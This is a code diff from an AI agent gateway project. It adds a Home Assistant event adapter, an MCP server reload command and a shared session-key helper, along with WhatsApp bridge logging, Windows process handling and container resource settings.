+        self._watch_entities: Set[str] = set(extra.get("watch_entities", []))
+        self._ignore_entities: Set[str] = set(extra.get("ignore_entities", []))
+        self._cooldown_seconds: int = int(extra.get("cooldown_seconds", 30))
+
+        # Cooldown tracking: entity_id -> last_event_timestamp
+        self._last_event_time: Dict[str, float] = {}
+
+    def _next_id(self) -> int:
+        """Return the next WebSocket message ID."""
+        self._msg_id += 1
+        return self._msg_id
+
+    # ------------------------------------------------------------------
+    # Connection lifecycle
+    # ------------------------------------------------------------------
+
+    async def connect(self) -> bool:
+        """Connect to HA WebSocket API and subscribe to events."""
+        if not AIOHTTP_AVAILABLE:
+            logger.warning("[%s] aiohttp not installed. Run: pip install aiohttp", self.name)
+            return False
+
+        if not self._hass_token:
+            logger.warning("[%s] No HASS_TOKEN configured", self.name)
+            return False
+
+        try:
+            success = await self._ws_connect()
+            if not success:
+                return False
+
+            # Dedicated REST session for send() calls
+            self._rest_session = aiohttp.ClientSession()
+
+            # Start background listener
+            self._listen_task = asyncio.create_task(self._listen_loop())
+            self._running = True
+            logger.info("[%s] Connected to %s", self.name, self._hass_url)
+            return True
+
+        except Exception as e:
+            logger.error("[%s] Failed to connect: %s", self.name, e)
+            return False
+
+    async def _ws_connect(self) -> bool:
+        """Establish WebSocket connection and authenticate."""
+        ws_url = self._hass_url.replace("http://", "ws://").replace("https://", "wss://")
+        ws_url = f"{ws_url}/api/websocket"
+
+        self._session = aiohttp.ClientSession()
+        self._ws = await self._session.ws_connect(ws_url, heartbeat=30)
+
+        # Step 1: Receive auth_required
+        msg = await self._ws.receive_json()
+        if msg.get("type") != "auth_required":
+            logger.error("Expected auth_required, got: %s", msg.get("type"))
+            await self._cleanup_ws()
+            return False
+
+        # Step 2: Send auth
+        await self._ws.send_json({
+            "type": "auth",
+            "access_token": self._hass_token,
+        })
+
+        # Step 3: Wait for auth_ok
+        msg = await self._ws.receive_json()
+        if msg.get("type") != "auth_ok":
+            logger.error("Auth failed: %s", msg)
+            await self._cleanup_ws()
+            return False
+
+        # Step 4: Subscribe to state_changed events
+        sub_id = self._next_id()
+        await self._ws.send_json({
+            "id": sub_id,
+            "type": "subscribe_events",
+            "event_type": "state_changed",
+        })
+
+        # Verify subscription acknowledgement
+        msg = await self._ws.receive_json()
+        if not msg.get("success"):
+            logger.error("Failed to subscribe to events: %s", msg)
+            await self._cleanup_ws()
+            return False
+
+        return True
+
+    async def _cleanup_ws(self) -> None:
+        """Close WebSocket and session."""
+        if self._ws and not self._ws.closed:
+            await self._ws.close()
+        self._ws = None
+        if self._session and not self._session.closed:
+            await self._session.close()
+        self._session = None
+
+    async def disconnect(self) -> None:
+        """Disconnect from Home Assistant."""
+        self._running = False
+        if self._listen_task:
+            self._listen_task.cancel()
+            try:
+                await self._listen_task
+            except asyncio.CancelledError:
+                pass
+            self._listen_task = None
+
+        await self._cleanup_ws()
+        if self._rest_session and not self._rest_session.closed:
+            await self._rest_session.close()
+        self._rest_session = None
+        logger.info("[%s] Disconnected", self.name)
+
+    # ------------------------------------------------------------------
+    # Event listener
+    # ------------------------------------------------------------------
+
+    async def _listen_loop(self) -> None:
+        """Main event loop with automatic reconnection."""
+        backoff_idx = 0
+
+        while self._running:
+            try:
+                await self._read_events()
+            except asyncio.CancelledError:
+                return
+            except Exception as e:
+                logger.warning("[%s] WebSocket error: %s", self.name, e)
+
+            if not self._running:
+                return
+
+            # Reconnect with backoff
+            delay = self._BACKOFF_STEPS[min(backoff_idx, len(self._BACKOFF_STEPS) - 1)]
+            logger.info("[%s] Reconnecting in %ds...", self.name, delay)
+            await asyncio.sleep(delay)
+            backoff_idx += 1
+
+            try:
+                await self._cleanup_ws()
+                success = await self._ws_connect()
+                if success:
+                    backoff_idx = 0  # Reset on successful reconnect
+                    logger.info("[%s] Reconnected", self.name)
+            except Exception as e:
+                logger.warning("[%s] Reconnection failed: %s", self.name, e)
+
+    async def _read_events(self) -> None:
+        """Read events from WebSocket until disconnected."""
+        if self._ws is None or self._ws.closed:
+            return
+        async for ws_msg in self._ws:
+            if ws_msg.type == aiohttp.WSMsgType.TEXT:
+                try:
+                    data = json.loads(ws_msg.data)
+                    if data.get("type") == "event":
+                        await self._handle_ha_event(data.get("event", {}))
+                except json.JSONDecodeError:
+                    logger.debug("Invalid JSON from HA WS: %s", ws_msg.data[:200])
+            elif ws_msg.type in (aiohttp.WSMsgType.CLOSED, aiohttp.WSMsgType.ERROR):
+                break
+
+    async def _handle_ha_event(self, event: Dict[str, Any]) -> None:
+        """Process a state_changed event from Home Assistant."""
+        event_data = event.get("data", {})
+        entity_id: str = event_data.get("entity_id", "")
+
+        if not entity_id:
+            return
+
+        # Apply ignore filter
+        if entity_id in self._ignore_entities:
+            return
+
+        # Apply domain/entity watch filters
+        domain = entity_id.split(".")[0] if "." in entity_id else ""
+        if self._watch_domains or self._watch_entities:
+            domain_match = domain in self._watch_domains if self._watch_domains else False
+            entity_match = entity_id in self._watch_entities if self._watch_entities else False
+            if not domain_match and not entity_match:
+                return
+
+        # Apply cooldown
+        now = time.time()
+        last = self._last_event_time.get(entity_id, 0)
+        if (now - last) < self._cooldown_seconds:
+            return
+        self._last_event_time[entity_id] = now
+
+        # Build human-readable message
+        old_state = event_data.get("old_state", {})
+        new_state = event_data.get("new_state", {})
+        message = self._format_state_change(entity_id, old_state, new_state)
+
+        if not message:
+            return
+
+        # Build MessageEvent and forward to handler
+        source = self.build_source(
+            chat_id="ha_events",
+            chat_name="Home Assistant Events",
+            chat_type="channel",
+            user_id="homeassistant",
+            user_name="Home Assistant",
+        )
+
+        msg_event = MessageEvent(
+            text=message,
+            message_type=MessageType.TEXT,
+            source=source,
+            message_id=f"ha_{entity_id}_{int(now)}",
+            timestamp=datetime.now(),
+        )
+
+        await self.handle_message(msg_event)
+
+    @staticmethod
+    def _format_state_change(
+        entity_id: str,
+        old_state: Dict[str, Any],
+        new_state: Dict[str, Any],
+    ) -> Optional[str]:
+        """Convert a state_changed event into a human-readable description."""
+        if not new_state:
+            return None
+
+        old_val = old_state.get("state", "unknown") if old_state else "unknown"
+        new_val = new_state.get("state", "unknown")
+
+        # Skip if state didn't actually change
+        if old_val == new_val:
+            return None
+
+        friendly_name = new_state.get("attributes", {}).get("friendly_name", entity_id)
+        domain = entity_id.split(".")[0] if "." in entity_id else ""
+
+        # Domain-specific formatting
+        if domain == "climate":
+            attrs = new_state.get("attributes", {})
+            temp = attrs.get("current_temperature", "?")
+            target = attrs.get("temperature", "?")
+            return (
+                f"[Home Assistant] {friendly_name}: HVAC mode changed from "
+                f"'{old_val}' to '{new_val}' (current: {temp}, target: {target})"
+            )
+
+        if domain == "sensor":
+            unit = new_state.get("attributes", {}).get("unit_of_measurement", "")
+            return (
+                f"[Home Assistant] {friendly_name}: changed from "
+                f"{old_val}{unit} to {new_val}{unit}"
+            )
+
+        if domain == "binary_sensor":
+            return (
+                f"[Home Assistant] {friendly_name}: "
+                f"{'triggered' if new_val == 'on' else 'cleared'} "
+                f"(was {'triggered' if old_val == 'on' else 'cleared'})"
+            )
+
+        if domain in ("light", "switch", "fan"):
+            return (
+                f"[Home Assistant] {friendly_name}: turned "
+                f"{'on' if new_val == 'on' else 'off'}"
+            )
+
+        if domain == "alarm_control_panel":
+            return (
+                f"[Home Assistant] {friendly_name}: alarm state changed from "
+                f"'{old_val}' to '{new_val}'"
+            )
+
+        # Generic fallback
+        return (
+            f"[Home Assistant] {friendly_name} ({entity_id}): "
+            f"changed from '{old_val}' to '{new_val}'"
+        )
+
+    # ------------------------------------------------------------------
+    # Outbound messaging
+    # ------------------------------------------------------------------
+
+    async def send(
+        self,
+        chat_id: str,
+        content: str,
+        reply_to: Optional[str] = None,
+        metadata: Optional[Dict[str, Any]] = None,
+    ) -> SendResult:
+        """Send a notification via HA REST API (persistent_notification.create).
+
+        Uses the REST API instead of WebSocket to avoid a race condition
+        with the event listener loop that reads from the same WS connection.
+        """
+        url = f"{self._hass_url}/api/services/persistent_notification/create"
+        headers = {
+            "Authorization": f"Bearer {self._hass_token}",
+            "Content-Type": "application/json",
+        }
+        payload = {
+            "title": "Hermes Agent",
+            "message": content[:self.MAX_MESSAGE_LENGTH],
+        }
+
+        try:
+            if self._rest_session:
+                async with self._rest_session.post(
+                    url,
+                    headers=headers,
+                    json=payload,
+                    timeout=aiohttp.ClientTimeout(total=10),
+                ) as resp:
+                    if resp.status < 300:
+                        return SendResult(success=True, message_id=uuid.uuid4().hex[:12])
+                    else:
+                        body = await resp.text()
+                        return SendResult(success=False, error=f"HTTP {resp.status}: {body}")
+            else:
+                async with aiohttp.ClientSession() as session:
+                    async with session.post(
+                        url,
+                        headers=headers,
+                        json=payload,
+                        timeout=aiohttp.ClientTimeout(total=10),
+                    ) as resp:
+                        if resp.status < 300:
+                            return SendResult(success=True, message_id=uuid.uuid4().hex[:12])
+                        else:
+                            body = await resp.text()
+                            return SendResult(success=False, error=f"HTTP {resp.status}: {body}")
+
+        except asyncio.TimeoutError:
+            return SendResult(success=False, error="Timeout sending notification to HA")
+        except Exception as e:
+            return SendResult(success=False, error=str(e))
+
+    async def send_typing(self, chat_id: str) -> None:
+        """No typing indicator for Home Assistant."""
+        pass
+
+    async def get_chat_info(self, chat_id: str) -> Dict[str, Any]:
+        """Return basic info about the HA event channel."""
+        return {
+            "name": "Home Assistant Events",
+            "type": "channel",
+            "url": self._hass_url,
+        }
--- a/gateway/platforms/telegram.py
+++ b/gateway/platforms/telegram.py
@@ -29,7 +29,17 @@ except ImportError:
    Bot = Any
    Message = Any
    Application = Any
-    ContextTypes = Any
+    CommandHandler = Any
+    TelegramMessageHandler = Any
+    filters = None
+    ParseMode = None
+    ChatType = None
+
+    # Mock ContextTypes so type annotations using ContextTypes.DEFAULT_TYPE
+    # don't crash during class definition when the library isn't installed.
+    class _MockContextTypes:
+        DEFAULT_TYPE = Any
+    ContextTypes = _MockContextTypes

 import sys
 from pathlib import Path as _Path
--- a/gateway/platforms/whatsapp.py
+++ b/gateway/platforms/whatsapp.py
@@ -19,7 +19,10 @@ import asyncio
 import json
 import logging
 import os
+import platform
 import subprocess
+
+_IS_WINDOWS = platform.system() == "Windows"
 from pathlib import Path
 from typing import Dict, List, Optional, Any

@@ -97,6 +100,8 @@ class WhatsAppAdapter(BasePlatformAdapter):
            Path.home() / ".hermes" / "whatsapp" / "session"
        ))
        self._message_queue: asyncio.Queue = asyncio.Queue()
+        self._bridge_log_fh = None
+        self._bridge_log: Optional[Path] = None
    
    async def connect(self) -> bool:
        """
@@ -156,25 +161,36 @@ class WhatsAppAdapter(BasePlatformAdapter):
            except Exception:
                pass
            
-            # Start the bridge process in its own process group
+            # Start the bridge process in its own process group.
+            # Route output to a log file so QR codes, errors, and reconnection
+            # messages are preserved for troubleshooting.
+            whatsapp_mode = os.getenv("WHATSAPP_MODE", "self-chat")
+            self._bridge_log = self._session_path.parent / "bridge.log"
+            bridge_log_fh = open(self._bridge_log, "a")
+            self._bridge_log_fh = bridge_log_fh
            self._bridge_process = subprocess.Popen(
                [
                    "node",
                    str(bridge_path),
                    "--port", str(self._bridge_port),
                    "--session", str(self._session_path),
+                    "--mode", whatsapp_mode,
                ],
-                stdout=subprocess.DEVNULL,
-                stderr=subprocess.DEVNULL,
-                preexec_fn=os.setsid,
+                stdout=bridge_log_fh,
+                stderr=bridge_log_fh,
+                preexec_fn=None if _IS_WINDOWS else os.setsid,
            )
            
-            # Wait for bridge to be ready via HTTP health check
+            # Wait for the bridge to connect to WhatsApp.
+            # Phase 1: wait for the HTTP server to come up (up to 15s).
+            # Phase 2: wait for WhatsApp status: connected (up to 15s more).
            import aiohttp
+            http_ready = False
            for attempt in range(15):
                await asyncio.sleep(1)
                if self._bridge_process.poll() is not None:
                    print(f"[{self.name}] Bridge process died (exit code {self._bridge_process.returncode})")
+                    print(f"[{self.name}] Check log: {self._bridge_log}")
                    return False
                try:
                    async with aiohttp.ClientSession() as session:
@@ -183,21 +199,54 @@ class WhatsAppAdapter(BasePlatformAdapter):
                            timeout=aiohttp.ClientTimeout(total=2)
                        ) as resp:
                            if resp.status == 200:
+                                http_ready = True
                                data = await resp.json()
-                                print(f"[{self.name}] Bridge ready (status: {data.get('status', '?')})")
-                                break
+                                if data.get("status") == "connected":
+                                    print(f"[{self.name}] Bridge ready (status: connected)")
+                                    break
                except Exception:
                    continue
-            else:
-                print(f"[{self.name}] Bridge did not become ready in 15s")
+            
+            if not http_ready:
+                print(f"[{self.name}] Bridge HTTP server did not start in 15s")
+                print(f"[{self.name}] Check log: {self._bridge_log}")
                return False
            
+            # Phase 2: HTTP is up but WhatsApp may still be connecting.
+            # Give it more time to authenticate with saved credentials.
+            if data.get("status") != "connected":
+                print(f"[{self.name}] Bridge HTTP ready, waiting for WhatsApp connection...")
+                for attempt in range(15):
+                    await asyncio.sleep(1)
+                    if self._bridge_process.poll() is not None:
+                        print(f"[{self.name}] Bridge process died during connection")
+                        print(f"[{self.name}] Check log: {self._bridge_log}")
+                        return False
+                    try:
+                        async with aiohttp.ClientSession() as session:
+                            async with session.get(
+                                f"http://localhost:{self._bridge_port}/health",
+                                timeout=aiohttp.ClientTimeout(total=2)
+                            ) as resp:
+                                if resp.status == 200:
+                                    data = await resp.json()
+                                    if data.get("status") == "connected":
+                                        print(f"[{self.name}] Bridge ready (status: connected)")
+                                        break
+                    except Exception:
+                        continue
+                else:
+                    # Still not connected — warn but proceed (bridge may
+                    # auto-reconnect later, e.g. after a code 515 restart).
+                    print(f"[{self.name}] ⚠ WhatsApp not connected after 30s")
+                    print(f"[{self.name}]   Bridge log: {self._bridge_log}")
+                    print(f"[{self.name}]   If session expired, re-pair: hermes whatsapp")
+            
            # Start message polling task
            asyncio.create_task(self._poll_messages())
            
            self._running = True
            print(f"[{self.name}] Bridge started on port {self._bridge_port}")
-            print(f"[{self.name}] Scan QR code if prompted (check bridge output)")
            return True
            
        except Exception as e:
@@ -211,13 +260,19 @@ class WhatsAppAdapter(BasePlatformAdapter):
                # Kill the entire process group so child node processes die too
                import signal
                try:
-                    os.killpg(os.getpgid(self._bridge_process.pid), signal.SIGTERM)
+                    if _IS_WINDOWS:
+                        self._bridge_process.terminate()
+                    else:
+                        os.killpg(os.getpgid(self._bridge_process.pid), signal.SIGTERM)
                except (ProcessLookupError, PermissionError):
                    self._bridge_process.terminate()
                await asyncio.sleep(1)
                if self._bridge_process.poll() is None:
                    try:
-                        os.killpg(os.getpgid(self._bridge_process.pid), signal.SIGKILL)
+                        if _IS_WINDOWS:
+                            self._bridge_process.kill()
+                        else:
+                            os.killpg(os.getpgid(self._bridge_process.pid), signal.SIGKILL)
                    except (ProcessLookupError, PermissionError):
                        self._bridge_process.kill()
            except Exception as e:
@@ -234,6 +289,12 @@ class WhatsAppAdapter(BasePlatformAdapter):
        
        self._running = False
        self._bridge_process = None
+        if self._bridge_log_fh:
+            try:
+                self._bridge_log_fh.close()
+            except Exception:
+                pass
+            self._bridge_log_fh = None
        print(f"[{self.name}] Disconnected")
    
    async def send(
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -118,6 +118,7 @@ from gateway.session import (
    SessionContext,
    build_session_context,
    build_session_context_prompt,
+    build_session_key,
 )
 from gateway.delivery import DeliveryRouter, DeliveryTarget
 from gateway.platforms.base import BasePlatformAdapter, MessageEvent, MessageType
@@ -515,7 +516,14 @@ class GatewayRunner:
                logger.warning("Slack: slack-bolt not installed. Run: pip install 'hermes-agent[slack]'")
                return None
            return SlackAdapter(config)
-        
+
+        elif platform == Platform.HOMEASSISTANT:
+            from gateway.platforms.homeassistant import HomeAssistantAdapter, check_ha_requirements
+            if not check_ha_requirements():
+                logger.warning("HomeAssistant: aiohttp not installed or HASS_TOKEN not set")
+                return None
+            return HomeAssistantAdapter(config)
+
        return None
    
    def _is_user_authorized(self, source: SessionSource) -> bool:
@@ -529,6 +537,12 @@ class GatewayRunner:
        4. Global allow-all (GATEWAY_ALLOW_ALL_USERS=true)
        5. Default: deny
        """
+        # Home Assistant events are system-generated (state changes), not
+        # user-initiated messages.  The HASS_TOKEN already authenticates the
+        # connection, so HA events are always authorized.
+        if source.platform == Platform.HOMEASSISTANT:
+            return True
+
        user_id = source.user_id
        if not user_id:
            return False
@@ -624,11 +638,7 @@ class GatewayRunner:
        # PRIORITY: If an agent is already running for this session, interrupt it
        # immediately. This is before command parsing to minimize latency -- the
        # user's "stop" message reaches the agent as fast as possible.
-        _quick_key = (
-            f"agent:main:{source.platform.value}:{source.chat_type}:{source.chat_id}"
-            if source.chat_type != "dm"
-            else f"agent:main:{source.platform.value}:dm"
-        )
+        _quick_key = build_session_key(source)
        if _quick_key in self._running_agents:
            running_agent = self._running_agents[_quick_key]
            logger.debug("PRIORITY interrupt for session %s", _quick_key[:20])
@@ -645,7 +655,7 @@ class GatewayRunner:
        # Emit command:* hook for any recognized slash command
        _known_commands = {"new", "reset", "help", "status", "stop", "model",
                          "personality", "retry", "undo", "sethome", "set-home",
-                          "compress", "usage"}
+                          "compress", "usage", "reload-mcp"}
        if command and command in _known_commands:
            await self.hooks.emit(f"command:{command}", {
                "platform": source.platform.value if source.platform else "",
@@ -686,6 +696,9 @@ class GatewayRunner:

        if command == "usage":
            return await self._handle_usage_command(event)
+
+        if command == "reload-mcp":
+            return await self._handle_reload_mcp_command(event)
        
        # Skill slash commands: /skill-name loads the skill and sends to agent
        if command:
@@ -703,12 +716,7 @@ class GatewayRunner:
                logger.debug("Skill command check failed (non-fatal): %s", e)
        
        # Check for pending exec approval responses
-        if source.chat_type != "dm":
-            session_key_preview = f"agent:main:{source.platform.value}:{source.chat_type}:{source.chat_id}"
-        elif source.platform and source.platform.value == "whatsapp" and source.chat_id:
-            session_key_preview = f"agent:main:{source.platform.value}:dm:{source.chat_id}"
-        else:
-            session_key_preview = f"agent:main:{source.platform.value}:dm"
+        session_key_preview = build_session_key(source)
        if session_key_preview in self._pending_approvals:
            user_text = event.text.strip().lower()
            if user_text in ("yes", "y", "approve", "ok", "go", "do it"):
@@ -937,9 +945,12 @@ class GatewayRunner:
                    }
                )
            
-            # Find only the NEW messages from this turn (skip history we loaded)
-            history_len = len(history)
-            new_messages = agent_messages[history_len:] if len(agent_messages) > history_len else agent_messages
+            # Find only the NEW messages from this turn (skip history we loaded).
+            # Use the filtered history length (history_offset) that was actually
+            # passed to the agent, not len(history) which includes session_meta
+            # entries that were stripped before the agent saw them.
+            history_len = agent_result.get("history_offset", len(history))
+            new_messages = agent_messages[history_len:] if len(agent_messages) > history_len else []
            
            # If no new messages found (edge case), fall back to simple user/assistant
            if not new_messages:
@@ -1086,6 +1097,7 @@ class GatewayRunner:
            "`/sethome` — Set this chat as the home channel",
            "`/compress` — Compress conversation context",
            "`/usage` — Show token usage for this session",
+            "`/reload-mcp` — Reload MCP servers from config",
            "`/help` — Show this message",
        ]
        try:
@@ -1344,8 +1356,7 @@ class GatewayRunner:
    async def _handle_usage_command(self, event: MessageEvent) -> str:
        """Handle /usage command -- show token usage for the session's last agent run."""
        source = event.source
-        session_key = f"agent:main:{source.platform.value}:" + \
-                      (f"dm" if source.chat_type == "dm" else f"{source.chat_type}:{source.chat_id}")
+        session_key = build_session_key(source)

        agent = self._running_agents.get(session_key)
        if agent and hasattr(agent, "session_total_tokens") and agent.session_api_calls > 0:
@@ -1379,6 +1390,76 @@ class GatewayRunner:
            )
        return "No usage data available for this session."

+    async def _handle_reload_mcp_command(self, event: MessageEvent) -> str:
+        """Handle /reload-mcp command -- disconnect and reconnect all MCP servers."""
+        loop = asyncio.get_event_loop()
+        try:
+            from tools.mcp_tool import shutdown_mcp_servers, discover_mcp_tools, _load_mcp_config, _servers, _lock
+
+            # Capture old server names before shutdown
+            with _lock:
+                old_servers = set(_servers.keys())
+
+            # Read new config before shutting down, so we know what will be added/removed
+            new_config = _load_mcp_config()
+            new_server_names = set(new_config.keys())
+
+            # Shutdown existing connections
+            await loop.run_in_executor(None, shutdown_mcp_servers)
+
+            # Reconnect by discovering tools (reads config.yaml fresh)
+            new_tools = await loop.run_in_executor(None, discover_mcp_tools)
+
+            # Compute what changed
+            with _lock:
+                connected_servers = set(_servers.keys())
+
+            added = connected_servers - old_servers
+            removed = old_servers - connected_servers
+            reconnected = connected_servers & old_servers
+
+            lines = ["🔄 **MCP Servers Reloaded**\n"]
+            if reconnected:
+                lines.append(f"♻️ Reconnected: {', '.join(sorted(reconnected))}")
+            if added:
+                lines.append(f"➕ Added: {', '.join(sorted(added))}")
+            if removed:
+                lines.append(f"➖ Removed: {', '.join(sorted(removed))}")
+            if not connected_servers:
+                lines.append("No MCP servers connected.")
+            else:
+                lines.append(f"\n🔧 {len(new_tools)} tool(s) available from {len(connected_servers)} server(s)")
+
+            # Inject a message at the END of the session history so the
+            # model knows tools changed on its next turn.  Appended after
+            # all existing messages to preserve prompt-cache for the prefix.
+            change_parts = []
+            if added:
+                change_parts.append(f"Added servers: {', '.join(sorted(added))}")
+            if removed:
+                change_parts.append(f"Removed servers: {', '.join(sorted(removed))}")
+            if reconnected:
+                change_parts.append(f"Reconnected servers: {', '.join(sorted(reconnected))}")
+            tool_summary = f"{len(new_tools)} MCP tool(s) now available" if new_tools else "No MCP tools available"
+            change_detail = ". ".join(change_parts) + ". " if change_parts else ""
+            reload_msg = {
+                "role": "user",
+                "content": f"[SYSTEM: MCP servers have been reloaded. {change_detail}{tool_summary}. The tool list for this conversation has been updated accordingly.]",
+            }
+            try:
+                session_entry = self.session_store.get_or_create_session(event.source)
+                self.session_store.append_to_transcript(
+                    session_entry.session_id, reload_msg
+                )
+            except Exception:
+                pass  # Best-effort; don't fail the reload over a transcript write
+
+            return "\n".join(lines)
+
+        except Exception as e:
+            logger.warning("MCP reload failed: %s", e)
+            return f"❌ MCP reload failed: {e}"
+
    def _set_session_env(self, context: SessionContext) -> None:
        """Set environment variables for the current session."""
        os.environ["HERMES_SESSION_PLATFORM"] = context.source.platform.value
@@ -1672,7 +1753,7 @@ class GatewayRunner:
        progress_queue = queue.Queue() if tool_progress_enabled else None
        last_tool = [None]  # Mutable container for tracking in closure
        
-        def progress_callback(tool_name: str, preview: str = None):
+        def progress_callback(tool_name: str, preview: str = None, args: dict = None):
            """Callback invoked by agent when a tool is called."""
            if not progress_queue:
                return
@@ -1692,6 +1773,7 @@ class GatewayRunner:
                "write_file": "✍️",
                "patch": "🔧",
                "search": "🔎",
+                "search_files": "🔎",
                "list_directory": "📂",
                "image_generate": "🎨",
                "text_to_speech": "🔊",
@@ -1717,14 +1799,28 @@ class GatewayRunner:
                "schedule_cronjob": "⏰",
                "list_cronjobs": "⏰",
                "remove_cronjob": "⏰",
+                "execute_code": "🐍",
+                "delegate_task": "🔀",
+                "clarify": "❓",
+                "skill_manage": "📝",
            }
            emoji = tool_emojis.get(tool_name, "⚙️")
            
+            # Verbose mode: show detailed arguments
+            if progress_mode == "verbose" and args:
+                import json as _json
+                args_str = _json.dumps(args, ensure_ascii=False, default=str)
+                if len(args_str) > 200:
+                    args_str = args_str[:197] + "..."
+                msg = f"{emoji} {tool_name}({list(args.keys())})\n{args_str}"
+                progress_queue.put(msg)
+                return
+            
            if preview:
                # Truncate preview to keep messages clean
-                if len(preview) > 40:
-                    preview = preview[:37] + "..."
-                msg = f"{emoji} {tool_name}... \"{preview}\""
+                if len(preview) > 80:
+                    preview = preview[:77] + "..."
+                msg = f"{emoji} {tool_name}: \"{preview}\""
            else:
                msg = f"{emoji} {tool_name}..."
            
@@ -1935,6 +2031,7 @@ class GatewayRunner:
                    "messages": result.get("messages", []),
                    "api_calls": result.get("api_calls", 0),
                    "tools": tools_holder[0] or [],
+                    "history_offset": len(agent_history),
                }
            
            # Scan tool results for MEDIA:<path> tags that need to be delivered
@@ -1977,6 +2074,7 @@ class GatewayRunner:
                "messages": result_holder[0].get("messages", []) if result_holder[0] else [],
                "api_calls": result_holder[0].get("api_calls", 0) if result_holder[0] else 0,
                "tools": tools_holder[0] or [],
+                "history_offset": len(agent_history),
            }
        
        # Start progress message sender if enabled
@@ -2202,7 +2300,14 @@ async def start_gateway(config: Optional[GatewayConfig] = None) -> bool:
    # Stop cron ticker cleanly
    cron_stop.set()
    cron_thread.join(timeout=5)
-    
+
+    # Close MCP server connections
+    try:
+        from tools.mcp_tool import shutdown_mcp_servers
+        shutdown_mcp_servers()
+    except Exception:
+        pass
+
    return True


--- a/gateway/session.py
+++ b/gateway/session.py
@@ -281,6 +281,20 @@ class SessionEntry:
        )


+def build_session_key(source: SessionSource) -> str:
+    """Build a deterministic session key from a message source.
+
+    This is the single source of truth for session key construction.
+    WhatsApp DMs include chat_id (multi-user), other DMs do not (single owner).
+    """
+    platform = source.platform.value
+    if source.chat_type == "dm":
+        if platform == "whatsapp" and source.chat_id:
+            return f"agent:main:{platform}:dm:{source.chat_id}"
+        return f"agent:main:{platform}:dm"
+    return f"agent:main:{platform}:{source.chat_type}:{source.chat_id}"
+
+
 class SessionStore:
    """
    Manages session storage and retrieval.
@@ -337,16 +351,7 @@ class SessionStore:
    
    def _generate_session_key(self, source: SessionSource) -> str:
        """Generate a session key from a source."""
-        platform = source.platform.value
-
-        if source.chat_type == "dm":
-            # WhatsApp DMs come from different people, each needs its own session.
-            # Other platforms (Telegram, Discord) have a single DM with the bot owner.
-            if platform == "whatsapp" and source.chat_id:
-                return f"agent:main:{platform}:dm:{source.chat_id}"
-            return f"agent:main:{platform}:dm"
-        else:
-            return f"agent:main:{platform}:{source.chat_type}:{source.chat_id}"
+        return build_session_key(source)
    
    def _should_reset(self, entry: SessionEntry, source: SessionSource) -> bool:
        """
@@ -390,9 +395,25 @@ class SessionStore:
        return False
    
    def has_any_sessions(self) -> bool:
-        """Check if any sessions have ever been created (across all platforms)."""
+        """Check if any sessions have ever been created (across all platforms).
+
+        Uses the SQLite database as the source of truth because it preserves
+        historical session records (ended sessions still count).  The in-memory
+        ``_entries`` dict replaces entries on reset, so ``len(_entries)`` would
+        stay at 1 for single-platform users — which is the bug this fixes.
+
+        The current session is already in the DB by the time this is called
+        (get_or_create_session runs first), so we check ``> 1``.
+        """
+        if self._db:
+            try:
+                return self._db.session_count() > 1
+            except Exception:
+                pass  # fall through to heuristic
+        # Fallback: check if sessions.json was loaded with existing data.
+        # This covers the rare case where the DB is unavailable.
        self._ensure_loaded()
-        return len(self._entries) > 1  # >1 because the current new session is already in _entries
+        return len(self._entries) > 1
    
    def get_or_create_session(
        self, 
--- a/hermes_cli/banner.py
+++ b/hermes_cli/banner.py
@@ -196,6 +196,28 @@ def build_welcome_banner(console: Console, model: str, cwd: str,
    if remaining_toolsets > 0:
        right_lines.append(f"[dim #B8860B](and {remaining_toolsets} more toolsets...)[/]")

+    # MCP Servers section (only if configured)
+    try:
+        from tools.mcp_tool import get_mcp_status
+        mcp_status = get_mcp_status()
+    except Exception:
+        mcp_status = []
+
+    if mcp_status:
+        right_lines.append("")
+        right_lines.append("[bold #FFBF00]MCP Servers[/]")
+        for srv in mcp_status:
+            if srv["connected"]:
+                right_lines.append(
+                    f"[dim #B8860B]{srv['name']}[/] [#FFF8DC]({srv['transport']})[/] "
+                    f"[dim #B8860B]—[/] [#FFF8DC]{srv['tools']} tool(s)[/]"
+                )
+            else:
+                right_lines.append(
+                    f"[red]{srv['name']}[/] [dim]({srv['transport']})[/] "
+                    f"[red]— failed[/]"
+                )
+
    right_lines.append("")
    right_lines.append("[bold #FFBF00]Available Skills[/]")
    skills_by_category = get_available_skills()
@@ -216,7 +238,12 @@ def build_welcome_banner(console: Console, model: str, cwd: str,
        right_lines.append("[dim #B8860B]No skills installed[/]")

    right_lines.append("")
-    right_lines.append(f"[dim #B8860B]{len(tools)} tools · {total_skills} skills · /help for commands[/]")
+    mcp_connected = sum(1 for s in mcp_status if s["connected"]) if mcp_status else 0
+    summary_parts = [f"{len(tools)} tools", f"{total_skills} skills"]
+    if mcp_connected:
+        summary_parts.append(f"{mcp_connected} MCP servers")
+    summary_parts.append("/help for commands")
+    right_lines.append(f"[dim #B8860B]{' · '.join(summary_parts)}[/]")

    right_content = "\n".join(right_lines)
    layout_table.add_row(left_content, right_content)
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -13,11 +13,14 @@ This module provides:
 """

 import os
+import platform
 import sys
 import subprocess
 from pathlib import Path
 from typing import Dict, Any, Optional, List, Tuple

+_IS_WINDOWS = platform.system() == "Windows"
+
 import yaml

 from hermes_cli.colors import Colors, color
@@ -68,6 +71,11 @@ DEFAULT_CONFIG = {
        "docker_image": "nikolaik/python-nodejs:python3.11-nodejs20",
        "singularity_image": "docker://nikolaik/python-nodejs:python3.11-nodejs20",
        "modal_image": "nikolaik/python-nodejs:python3.11-nodejs20",
+        # Container resource limits (docker, singularity, modal — ignored for local/ssh)
+        "container_cpu": 1,
+        "container_memory": 5120,       # MB (default 5GB)
+        "container_disk": 51200,        # MB (default 50GB)
+        "container_persistent": True,   # Persist filesystem across sessions
    },
    
    "browser": {
@@ -136,7 +144,7 @@ DEFAULT_CONFIG = {
    "command_allowlist": [],
    
    # Config schema version - bump this when adding new required fields
-    "_config_version": 4,
+    "_config_version": 5,
 }

 # =============================================================================
@@ -618,7 +626,10 @@ def load_env() -> Dict[str, str]:
    env_vars = {}
    
    if env_path.exists():
-        with open(env_path) as f:
+        # On Windows, open() defaults to the system locale (cp1252) which can
+        # fail on UTF-8 .env files. Use explicit UTF-8 only on Windows.
+        open_kw = {"encoding": "utf-8", "errors": "replace"} if _IS_WINDOWS else {}
+        with open(env_path, **open_kw) as f:
            for line in f:
                line = line.strip()
                if line and not line.startswith('#') and '=' in line:
@@ -633,10 +644,14 @@ def save_env_value(key: str, value: str):
    ensure_hermes_home()
    env_path = get_env_path()
    
-    # Load existing
